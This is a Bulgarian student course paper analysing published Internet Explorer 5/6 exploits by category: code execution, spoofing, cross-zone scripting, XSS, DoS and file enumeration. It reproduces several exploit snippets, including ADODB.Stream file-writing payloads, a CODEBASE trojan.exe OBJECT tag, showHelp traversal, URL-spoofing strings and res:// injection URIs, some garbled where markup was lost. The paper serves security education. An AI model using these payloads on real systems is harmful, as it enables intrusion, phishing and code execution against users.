Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Анализ на излезлите експлойти за Internet Еxplorer Курсов проект по Мрежова Сигурност – Сигурен Код

Ангелина Тагарева, ф.н. 43153 Радостин Цанев, ф.н. 43089

По неофициални статистически данни повече от 80% от дяла на използваните браузери се пада на . Като най-често използван интернет браузер, сигурността очевидно не е била основна задача при имплементирането му. Свидетелство за това са многобройните уязвимости и експлойти, излези за този продукт. Интересното в случая е, че уязвимостите в MS IE са пъти повече от конкурентни open source решения, въпреки че кодът на браузера е затворен.

Преди за започнем същинското изложение на излезлите експлйти за Microsoft Internet Explorer, ще направим няколко уточнения. Първо е важно да отбележим каква е разликата между уязвимост и експлойт. Уязвимост представлява проблем в сигурността на даден софтуер. Експлойтът е програмен код, който се възплозва от тази уязвимост. Тези две понятия вървят ръка за ръка, затова в нашето изложение ще посочваме първо за каква уязвимост се отнасят дадените експлойти и чак след това ще пристъпваме към самото им разглеждане.

В политиката за сигурността на IE е застъпена идеята за различни зони на сигурност. Те биват четири вида: Internet Zone, Local Zone, Trusted Sites и Restricted Sites. Според официалния сайт на Microsoft, "Сигурността, залегната в е добре балансирана. При първата инсталлация на браузера, той поставя всички уеб сайтове в Internet Zone със средно ниво на сигурност. По този начин може да браузвате сигурно и ще бъдете предупраждавани преди свалянето на потенциално опасно съдържание". Ще видим случаи, в които това въобще не е валидно.

Формално експлойтите за MS IE могат да бъдат разделени на няколко части, според тяхната опасност и предназначение. Ние ще ги разделим по следния начин:

1. Експлойти, които позволяват изпълнението на чужд код на клиентската машина - това са експлойтите с най-висока спепен на риск, по разбираеми причини. Намират се в най-горната част от йерархията на експлойтите, понеже често се възплозват от други експлойти и уязвимости, с чиято помощ изпълняват зловредния код. Ако клиентският IE е податлив на такъв вид атаки, то клиентската машина се намира изцяло в ръцете на "лошия човек", който иска да получи контрол над нея.

2. Експлойти, които заблуждават клиента и създават в него лъжливо чувство за сигурност. Това са на пръв поглед не дотам опасни проблеми със сигурността, но всичко зависи от това за кого се прадставя злонамереният човек, който иска да ви заблуди. В повечето случаи този тип експлойти се използват за незаконно присвояване на номера на кредитни карти и всякакъв друг вид ценна информация. Нивото на опасност от този вид атака е повече от високо.

3. Cross-Zone Scripting експлойти или по-точно начини, по които може да присвоим права за изпъление на даден програмен фрагмент в контекста на Local Zone. Сами по себе си този тип екслпойти не са толкова опасни. Съчетани с други екслпойти, изпълнението на които изисква повишаването на правата на приложението, те се превръщат в сериозна заплаха за сигурността.

-1- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

4. Cross-Site Scripting(XSS) експлойти, с чиято помощ може да се постигне кражба на кукита, сесийни ключове и друг вид чувствителна информация.

5. DoS експлойти, с чиято помощ може да се блокира изпълниението на IE, както и да се застраши стабилността на системата.

6. Има и експлойти, които не попадат в горните категории и които ще разгледаме самостоятелно. Експлойти, които позволяват изпълнението на чужд код

Сега ще покажем как в средата на 2002 година е било възможно да се изпълнява код на клиентския компютър, без дори необходомостта да бъде включено. Преблемът идва от динамично добавяните HTML фрагменти във всяка една част от документа. Чрез използването на innerHTML, outerHTML или insertAdjacentHTML може да се постигне следния резултат:

За да може да се прилага този експлойт върху IE, в който са изключени Active Scripting и ActiveX, ще използваме Data Binding. То позволява на програмистите напълно да разделят презентацията от логиката. Източниците на данни (DSO) за Data Binding могат да бъдат най-различни, като например CVS, HTML или XML. С помощта на data-binding HTML елементи, като например div или span могат да бъдат свързани към DSO без нуждата от нито един ред скрипт. Ще използваме още, че когато атрибутът dataformatas има стойност '', тогава Data Binding използва вътрешно innerHTML за предоставане на данните на елемента. В следващия пример ще използваме XML като източник на данни и span за консуматор на тези данни.

]]>

Друг един експлойт се възползва от факта, че IE може да бъде накаран да се отвори и да зареди страница, без значение от зоната за сигурност, в която се намираме. За да се възползва от тази уязвимост, атакуващият трябва да използва форма'та за аудио/видео streaming на Microsoft WMV/WMA. WMV/WMA има възможността да включва в себе си скриптове, които контролират различни аспекти на клипа.

Именно тези скриптове правят възможно player-ът да отвори даден URL в определен период от време.

-2- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Това означава, че дори клипът да е пуснат в "Restricted Zone", лесно може да отвори URL в "Internet Zone" или всяка друга зона, която пожелае. Един добър пример за експлойт е когато атакуващият знае за съществуването на даден файл на клиентската машина, който иска да изпълни. За да се възползва от тази уязвимост, атакуващият има нужда от три файла. Първият е HTML, който потребителят трябва да разгледа и който зарежда клип (вторият файл). Сега остава само клипът да задери някой друг HTML, който съдържа в себе си object с codebase = "malicious.exe" и компютърът на жертвата вече е в ръцете на атакуващия. Ето един начин, по който може да се пусне за изпълнение клип, чието място на твърдия диск знаем:

Hello

Един друг проблем със сигурността на MS IE е, че той не оценява правилно "application/hta" MIME типът, който се използва от DATA атрибута на елемента OBJECT.

IE ще изпълни HTML приложение (HTA), което е посочено в DATA атрибутът на елемента OBJECT, ако Content-Type, върнат от сървъра, е "application/hta". Атакуващият може да използва тази дупка в сигурността, за да изпълни произволен код с привилегиите на потребителя, използващ IE.

Dynamic HTML Object Model (DOM) на IE дефинира елемента OBJECT като начин да се вграждат ActiveX контроли и други обекти в HTML документи. Атрибутът DATA е URI, който предоставя данните за обекта, например .

HTML приложенията (HTA) са HTML документи, които се изпълняват като доверени приложения, които не са обект на ограниченията в сигурността на IE. HTA могат да изпълняват скриптове, Java или ActiveX контроли. В документацията на Microsoft пише следното: "Внимание, HTA могат да подложат машината на клиента под въздействието на злонамерени скриптове. HTA, също като .exe файловете, имат права за четене и запис на файлове и работа с регистрите. Само с няколко кратки команди, може да се създадат много мощни изпълними файлове. Изпълнението на HTA не се препоръчва на места, където произхода на файла е съмнителен".

Вместо да приема Content-Type хедъра, предоставен от сървъра (както се препоръчва в RFC 2616), IE използва доста сложна схема за определяне на MIME типа на даден файл, който е посочен в URI. В много случаи IE сваля и обработва(парсва) файла като част от процеса за определяне на типа му. Тази проверка не може да различи HTML от HTA файлове, понеже и двата типа са текстови файлове, които съдържат HTML код. Като резултат, IE приема Content-Type, предоставен от сървъра.

Когато се достъпва даден HTA файл директно, IE пита потребителя дали да свали или да изпълни файла. Проблемът идва от това, че когато HTA файл се задава от DATA атрибут на елемента OBJECT и уеб сървъра върне хедър с Content-Type равен на "application/hta", IE изпълнява HTA файла директно, без намеса на потребителя. HTML-ът който се използва за обръщение към HTA файла, може да бъде създаден по всеки един от следните начини: 1. Статичен HTML; 2. HTML, създаден от скрипт; 3. HTML, създаден чрез Data Binding.

-3- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Microsoft Internet Explorer Codebase Double Backslash Local Zone

Тази уязвимост позволява на HTML документи да добият непозволен достъп до локални ресурси, като се използват ресурси като стойности на CODEBASE поле. При определени условия това може да бъде използвано, за да се изпълнят файлове на клиентската машина. В частност, като се сложат две обратни наклонени черти в началото на пътя на ресурса, става възможно неговото изпъление. Този синтаксис все още е валиден, въпреки пачовете, които са излезли за неговото ограничаване.

Тази уязвимост работи, ако ресурсите се извикват от Local Zone-ата, така че трябва да се използват други уязвимости,за да се преодолеят зоновите ограничения и които да помогнат зловреден код да се изпълни в контекста на Local Zone.

Следният код може да се използва, за да се изполва тази уязвимост. file://[SysDrive]:\\[INTERNET CACHE PATH]\CONTENT.IE5\EXE.EXE :file://[SysDrive]:\\[INTERNET CACHE PATH]\CONTENT.IE5\MHT.MHT!file:///C:\EXE.EXE

Microsoft Internet Explorer Double Backslash CHM File Execution Weakness

Тази уязвимост позволява неправомерно изпъление на локални .CHM файлове от Internet Security Zone. Поради съображения за сигурност, този тип достъп е позволен единствено от Local Zone. Експлойт за тази уязвимост може да бъде съчетан с други, като резултатът ще бъде изпълнение на код на клиентския компютър.

Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability

IE e податлив на cross-zone scripting, което може да доведе до изпълнение на "лош" код в контекста на My Computer Zone. Зловредния код се изпълнява в контекста на Media Bar, чрез полето на window.open _media. Също възможни са и XSS атаки

Експлойт:

<script>

// '\\42' -> '\42' -> ' " ' img_src=':file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);'; inject_html=""; window.open('file:javascript:document.write("' + inject_html + '")','_media');

</script>

Microsoft Internet Explorer %USERPROFILE% File Execution Weakness

-4- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

В IE съществува проблем, който може да позволи на атакуващия да зареди всеки файл, намиращ се във временната директория на жертвата през уеб страница или HTML документ. За да разбере дали съществува даден файл във временната директория на потребителя, атакуващият трябва да използва други експлойти или просто сам да го постави там.

Ето и примерен експлойт, който се възползва от тази уязвимост:

Exploit

Също така, атакуващият може да изпълни кода на клиентската машина, задари уязвимост във функцията showHelp(). Атакуващият може да създаде HTML файл, който използва directory traversal пролука в имплементацията на showHelp(), за да изпълни произволни файлове на системата на жертвата. Файловете ще бъдат изпълнени в Local Computer security zone-ата с привилегиите на клиента. Пример за експлойт: showHelp("mk:@MSITStore:iexplore.chm: :..\\..\\..\\..\\chmfile.chm::/fileinchm.html");

Експлойти, които заблуждават клиента

Съществуват уязвимости в IE, които позволяват на злонамерени хора да заблуждават клиентите на големи компании, като например online банки и да изискват информация за техните кредитни карти и банкови сметки.

"Тези уязвимости позволяват на атакуващия да препрати своята жертва към сайт, който изглежда и се държи по същия начин като eBay и дори пише eBay.com в адрес бара. Но всъщност информацията, която изпраща потребителя отива в сайт, чиято единствена цел е да краде номера на кредитни карти", каза Ben Robinson.

Някои от тезт уязвимости работят също с SSL криптирани връзки. "В такъв случай е много лесно някой да се представи за банка или за някоя друга финансова организация и да убеди потребителя да даде своите детайли. Дори иконката с катинара в долния десен ъгъл на браузера изглежда нормално".

Microsoft Internet Explorer Interface Spoofing

Тази уязвимост в Internet Explorer позволява на недоброжелателни уеб сайтове да излъжат интерфейса на браузъра, като в Address bar-a се показва името на различен от текущия сайт. var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+72; vuln_y= window.screenTop-20; vuln_w= root.offsetWidth-520; vuln_h= 17; vuln_show(); } var vuln_win;

-5- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика function vuln_pop() { vuln_win= window.createPopup(); vuln_win.document.body.innerHTML= vuln_html; vuln_win.document.body.style.margin= 0; vuln_win.document.body.onunload= vuln_pop; vuln_show(); } function vuln_show() { if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h); } var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://\x3C/div>'.

Microsoft Internet Explorer Embedded Image URI Obfuscation

IE позволява скриването на истинския URI при натискането на картинка, която е линк към друг сайт. По този начин потребителят може да бъда заблуден, че даденият линк води към сайт, на който може да се има доверие. Ето примерен код, който се възползва от тази уязвимост:

http://www.example.com http://www.example.com

Microsoft Internet Explorer Meta Data Foreign Domain Spoofing

IE позволява потребителят да бъде излъган за сертифиkата на дадена страница(certificate spoofing). Причината за това е възможността да се вграждат сертификат и съдържание от външен домейн (чрез SSL) в дадена уеб страница. Когато страницата се посети от някой потребител, той ще трябва да уторизира сертификата на външния домейн. По този начин изглежда, че уеб странцицата, която е посетил принадлежи на външния домейн.

Трябва да отбележим, че връзката изглежда сигурна, поне съдейки по иконката в десния долeн ъгъл на процореца на браузера. Когато се кликне върху тази иконка, обаче, браузерът връща съобщение, че документът няма асоцииран сертификат, което може да ни наведе на мисълта, че сертификатът не е истински (spoofed).

Your Page Title

-6- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Засегнати са единствено IE 6.0 и IE 6.0 SP1.

Microsoft Internet Explorer HTML Form Status Bar Misrepresentation

Друг вектор за експлойт се явява възможността да се създаде HTML форма, в която стойността на submit елемента сочи към доверен сайт, а стойността на action сочи към сайт, посочен от атакуващия. Дори нещо повече, тази форма може да се вложи в anchor таг, в който стойността на href полето е адреса на доверения сайт. Ето и самият експлойт:

Microsoft Internet Explorer CLSID File Extension Misrepresentation

Проблем в IE възниква, ако в името на зловреден файл се посочи CLSID за HTML приложения, следвано от друго име на файл и разширение. По този начин може да се направи изпълним файл под формата на HTML приложение (HTA) и той да бъде направен да изглежда като най-обикнвен файл, например .mpg. Файлът ще изглежда по начин, по който атакауващият иска в диалога за сваляна на файлове. След това потребителя може да свали и изпълни файла, предполагайки, че той е напълно безвреден

Content-Disposition: attachment; filename=malware.{3050f4d8-98B5-11CF-BB82- 00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg" Засегнати са IE 6.0 и IE 6.0 SP1.

Съществува уязвимост в IE, която позволява на недоброжелателни хора да показват фалшиви URL-та в адрес и статус баровете. Тази уязвимост се дъжи на грешка при валидиране на входните данни и може да бъде използвана като се прибавят "%00" и "%01" след потребителското име и точно преди "@" в URL-то. Това позволява на лошите хора да показват произволно FQDN, различно от действителното в момента. Ето пример, при който показва http://www.trusted_site.com в статус бара и адрес бара, докато истинския домейн е malicious_site.com: http://www.trusted_site.com%01%00@malicious_site.com/malicious.html

Засегнати версии на IE > 5.0. Microsoft Internet Explorer File Download Warning Bypass Vulnerability

IE позволява прилагането на експлойт, чрез който може да бъде свален зловреден файл на клиентската машина. Атакуващият може да преименува файла по следния начин и да скрие разширението на файла от потребителя: http://www.example.com/file.exe?.html.

Засегнати версии на IE > 6.0.

-7- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Cross-Zone Scripting

Microsoft Internet Explorer ITS Protocol Zone Bypass

MS IE позволява зловредно съдържание да бъде интерпретирано в контекста на Local Zone. Този проблем може да бъде използван (exploited) чрез ITS (InfoTech Storage) Protocol URI handler. Възможно е този протокол да бъде използван, за да се накара браузерът да влезе в Local Zone, като пренасочим заявката към несъществуващ MHTML файл (за тази цел се използват други уязвимисти). Така става възможно да се изпълни зловреден код (например CHM) в Local Zone контекст. Този проблем, както и други уязвимости може да се използва за звтоматично изпращане и изпълнение на зловреден код. Това става възможно, когато злонамерено съдържание се рендира от Internet Explorer.

Outlook, както и всички компоненти, които използват IE за рендиране на HTML съдържание също са податливи на тази атака.

Трябва да се отбележи, че има няколко начина на извикване на протокол хендлъра, например ms-its:, ms-itss: и mk:@MSITStore: URI.

Следващият пример демонстрира как може да се exploit-не тази уязвимост:

Атакуващият може да създаде скрипт, (например launch.html), който съдържа CLASSID exploit, като например: <OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

След това се създава следният html, който изпълнява launch.html

click

Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting

Тази уязвимост в IE позволява неоторизиран достъп на недоброжелателни скриптове и Active Content до документи, намиращи се вразлични Security Zones и чужди домейни. Тук проблемите идват, когато се отворят пенели за търсене чрез метода window.open. Възможно е злонамерен скрипт да достъпи полета от чужд домейн, отворени с панела за търсене.

Използването на тази уязвимост води след себе си най-различни атаки, като кражба на cookie-та от произволен домейн. Трябва да отбележим, че панелът за търсене се използва от IE 5.0 нагоре.

<script> window.open("http://wrong_site_add/","_search") //За да се зареди "Friendly HTTP error messages" страницата // cause it's in My Computer Zone. setTimeout(function(){

// '\\42' -> '\42' -> ' " ' img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

-9- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

inject_html=""; window.open('file:javascript:document.write("' + inject_html + '")','_search');

},5000);

</script>

Microsoft Internet Explorer NavigateAndFind() Cross-Zone Policy

IE понякога не успява да премахне javascript URI от историята на браузера, като по този начин позволява на атакуващия да наруши cross-zone политиката.

Експлойт:

// Name: payload // Purpose: Run payload code called from Local Machine zone. // The code may be arbitrary such as executing shell commands. // This demo simply creates a harmless textfile on the desktop. function payload() { file = "sandblad.txt"; o = new ActiveXObject("ADODB.Stream"); o.Open(); o.Type=2; o.Charset="ascii"; o.WriteText("You are vulnerable!"); o.SaveToFile(file, 2); o.Close(); alert("File "+file+" created on desktop!"); }

// Name: trigger // Purpose: Inject javascript url in history list and run payload // function when the user hits the backbutton. function trigger(len) { if (history.length != len) payload(); else return "-"; }

// Name: backbutton // Purpose: Run backbutton exploit. function backbutton() { location = 'javascript:'+trigger+payload+'trigger('+history.length+')'; }

// Launch backbutton exploit on load if (confirm("Press OK to run backbutton exploit!")) backbutton();

Cross-Site Scripting

-10- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Microsoft Internet Explorer Cross-Domain Event Leakage

Тази уязвимост позволява изтичане на различни събития от frameset-ове в различни домейни. Това лесно може да доведе до улавяне на натисканите клавиши от чужд домейн.

Експлойт: IE Cross Frame Scripting Restriction Bypass Example

Microsoft Internet Explorer Custom HTTP Error HTML Injection

Когато IE се използва за показване на HTTP съобщения за грешка, по известни като "Friendly HTTP error messages", може да се получат HTML injection атаки. Поради грешки в извличането на URL-та от страниците за грешки, е възможно IE да изведе злонамерен HTML код.

Експлойт: res://shdoclc.dll/HTTP_501.htm#javascript:%2f*://*%2falert(location.href)/

и още един пример: res://shdoclc.dll/http_404.htm#javascript:alert(String.fromCharCode(72,101,108,1 08,111));//://clickme/

DoS

Начини за постигане на DoS има изключително много. Тук ще се спрем само на три примера за такъв тип атака, понеже те достатъчно добре показват как лесно може да бъде експлойтнат компютърът на жертвата.

Internet Explorer e податлив на DoS при обработването на зловреден скрипт, който съдържа метода window.createPopup(), чрез който се извиква 'http-equiv' мета таг.

Следният код може да бъде използван от атакуващия, за да предизвика DoS na браузера на жертвата

IE е податлив на DoS ataka чрез прекъсване на паметта. Тази уязвимост може да бъде използвана, като в зловредна страница се използва onLoad и методът window.location, за да се достъпи локален файл.

\xff:\filename или вместо filename може също да използваме hex стойности.

IE е податлив на DoS, предизвикана от грешно оформени XML тагове

Експлойт:

Други

Microsoft Internet Explorer JavaScript Local File Enumeration

Чрез тази уязвимост уебмастерът на даден сайт може да получава чувствителна информация. Когато даден скрипт включва файл, който е извън документът, в който е вграден и ако файлът не съществува, тогава onError event handler-a ще изпълни даден скрипт. Този скрипт може да определи дали файлът, който трябва да бъде включен съществува или не. По този начин може да се провери дали съществуват дадени файлове на клиентската машина, просто като се създават страници, в които се включват файове от локалната машина на клиента с помощта на file://.

Експлойт:

-12- Ангелина Тагарева, ф.н. 43153, 3 курс, специалност информатика Радостин Цанев, ф.н. 43089, 3 курс, специалност информатика

Microsoft Internet Explorer Unauthorized Clipboard Contents Disclosure

Съществува уязвимост в IE, която позволява на произволен сайт да получи достъп до съдържанието на клипборда на клиентския компютър. Тя използва метода execCommand("Paste"), за да копира съдържанието на клипборда в малка или скрита textarea. По този начин се избягват проверките, свързани със сигурността, които прави браузерът. Щетите, които би нанесъл такъв експлойт зависят единствено от това какво се съдържа в клипборда.

Експлойт: Clippy This is your clipboard:

Този проблем може да бъде избегнат като се изключи опцията "Allow paste options via scripting" в IE.

Microsoft Internet Explorer LoadPicture File Enumeration

Благодарение на тази уязвимост може да се провери дали съществува даден файл на клиентската машина. Само по себе си това не е толкова опасно, понеже по никакъв начин не нарушава цялостта на файла. Но тя дава удобно средство на други експлойти, които разчитат на това, че даден файл се намира на клиентския компютър.

Експлойт:

Microsoft Internet Explorer OBJECT Tag Buffer Overflow

MS IE e податлив на Buffer Overflow, дължащ се на OBJECT таговете в уеб страниците. Когато клиентска уеб страница съдържа OBJECT таг, използващ голям параметър, се препълва вътрешен буфер на браузера. Това кара IE да спре работата си и евентуално да позволи изпълнението на произволен код в контекста на текущия потребител.

Експлойт: Cooler Than Centra Spike

Заключение

Лошо впечатления прави, че една голяма част от проблемите, които излизат за MS IE засягат най-новите версии на браузера.

Много често намесата на Microsoft под формата на пускане на пачове и Service pack-ове не е достатъчно бърза. Това води до експлойтване на браузера в продължение на седмици, а понякога и месеци, преди да се появи пач, който отстранява проблема. Като прибавим към това големия брой излизащи експлойти и малкия брой на хората, които често ъпдейтват браузера си, се оказва, че използването на Microsoft Ineternet Explorer се превръща в истинско приключение. В това приключение потребителите се оказват жертви, а хората, които имат необходимите знания, желание и търпение стават хижниците, търсещи лесна плячка. Използвана литература:

1. http://securityfocus.com 2. http://www.safecenter.net/UMBRELLAWEBV4/ 3. http://www.freewebs.com/roozbeh_afrasiabi/ 4. http://www.theage.com.au/ 5. http://security.openwares.org/ 6. http://www.kb.cert.org/vuls/id/865940 7. http://www.microsoft.com/technet/security 8. http://www.zapthedingbat.com/security/ex01/vun1.htm 9. http://www.securitytracker.com/alerts/2004/Feb/1009067.html

-14-